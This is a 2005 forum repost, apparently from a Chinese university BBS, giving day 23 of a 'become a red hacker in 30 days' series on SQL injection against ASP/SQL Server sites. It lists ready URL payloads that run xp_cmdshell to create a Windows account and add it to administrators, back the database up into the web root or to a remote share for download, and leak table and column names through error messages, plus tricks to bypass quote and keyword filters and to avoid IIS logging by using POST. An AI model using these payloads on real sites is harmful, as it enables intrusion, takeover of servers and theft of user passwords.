● [转载]30天打造专业红客－[第23天]SQL注入攻击 - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: lovebo (waiting for you ), 信区: Security
标题: [转载]30天打造专业红客－[第23天]SQL注入攻击
发信站: 荔园晨风BBS站 (2005年06月20日14:49:13 星期一), 站内信件

昨天，我在最后提了这样的一个问题：如果碰到表名列名猜不到，或程序作者过滤了一些
特殊字符，怎么提高注入的成功率？怎么样提高猜解效率？下面我将分3个部分来说说这个
问题。
一
利用系统表注入SQLServer数据库
SQLServer是一个功能强大的数据库系统，与操作系统也有紧密的联系，这给开发者带来了
很大的方便，但另一方面，也为注入者提供了一个跳板，我们先来看看几个具体的例子：
① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password
/add”--
分号;在SQLServer中表示隔开前后两句语句，--表示后面的语句为注释，所以，这句语句
在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储过程xp_cmdsh
ell，这个存储过程用于调用系统命令，于是，用net命令新建了用户名为name、密码为pas
sword的windows的帐号，接着：
② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name
administrators /add”--
　　将新建的帐号name加入管理员组，不用两分钟，你已经拿到了系统最高权限！当然，
这种方法只适用于用sa连接数据库的情况，否则，是没有权限调用xp_cmdshell的。
　　③ http://Site/url.asp?id=1 ;;and db_name()>0
前面有个类似的例子and user>0，作用是获取连接用户名，db_name()是另一个系统变量，
返回的是连接的数据库名。
④ http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwro
ot\1.db’;--
这是相当狠的一招，从③拿到的数据库名，加上某些IIS出错暴露出的绝对路径，将数据库
备份到Web目录下面，再用HTTP把整个数据库就完完整整的下载回来，所有的管理员及用户
密码都一览无遗！在不知道绝对路径的时候，还可以备份到网络地址的方法（如\\202.96.
xx.xx\Share\1.db），但成功率不高。
⑤ http://Site/url.asp?id=1 ;and (Select Top 1 name from sysobjects
where xtype=’U’ and status>0)>0
前面说过，sysobjects是SQLServer的系统表，存储着所有的表名、视图、约束及其它对象
，xtype=’U’ and status>0，表示用户建立的表名，上面的语句将第一个表名取出，与0
比较大小，让报错信息把表名暴露出来。第二、第三个表名怎么获取？还是留给我们聪明
的读者思考吧。
⑥ http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1)
from sysobjects)>0
从⑤拿到表名后，用object_id(‘表名’)获取表名对应的内部ID，col_name(表名ID,1)代
表该表的第1个字段名，将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。
以上6点是我研究SQLServer注入以来的心血结晶，可以看出，对SQLServer的了解程度，直
接影响着成功率及猜解速度。
二
有很多人喜欢用’号测试注入漏洞，所以也有很多人用过滤’号的方法来“防止”注入漏
洞，这也许能挡住一些入门者的攻击，但对ＳＱＬ注入比较熟悉的人，还是可以利用相关
的函数，达到绕过程序限制的目的。
在前面的SQL一般注入中，我所用的语句，都是经过我优化，让其不包含有单引号的；在“
利用系统表注入SQLServer数据库”中，有些语句包含有’号，我们举个例子来看看怎么改
造这些语句：
简单的如where xtype=’U’，字符U对应的ASCII码是85，所以可以用where
xtype=char(85)代替；如果字符是中文的，比如where name=’用户’，可以用where
name=nchar(29992)+nchar(25143)代替。
三经典中的经典
经验小结
1.有些人会过滤Select、Update、Delete这些关键字，但偏偏忘记区分大小写，所以大家
可以用selecT这样尝试一下。
2.在猜不到字段名时，不妨看看网站上的登录表单，一般为了方便起见，字段名都与表单
的输入框取相同的名字。
3.特别注意：地址栏的+号传入程序后解释为空格，%2B解释为+号，%25解释为%号，具体可
以参考URLEncode的相关介绍。
4.用Get方法注入时，IIS会记录你所有的提交字符串，对Post方法做则不记录，所以能用P
ost的网址尽量不用Get。
5. 猜解Access时只能用Ascii逐字解码法，SQLServer也可以用这种方法，只需要两者之间
的区别即可，但是如果能用SQLServer的报错信息把值暴露出来，那效率和准确率会有极大
的提高。

--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.103.176]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店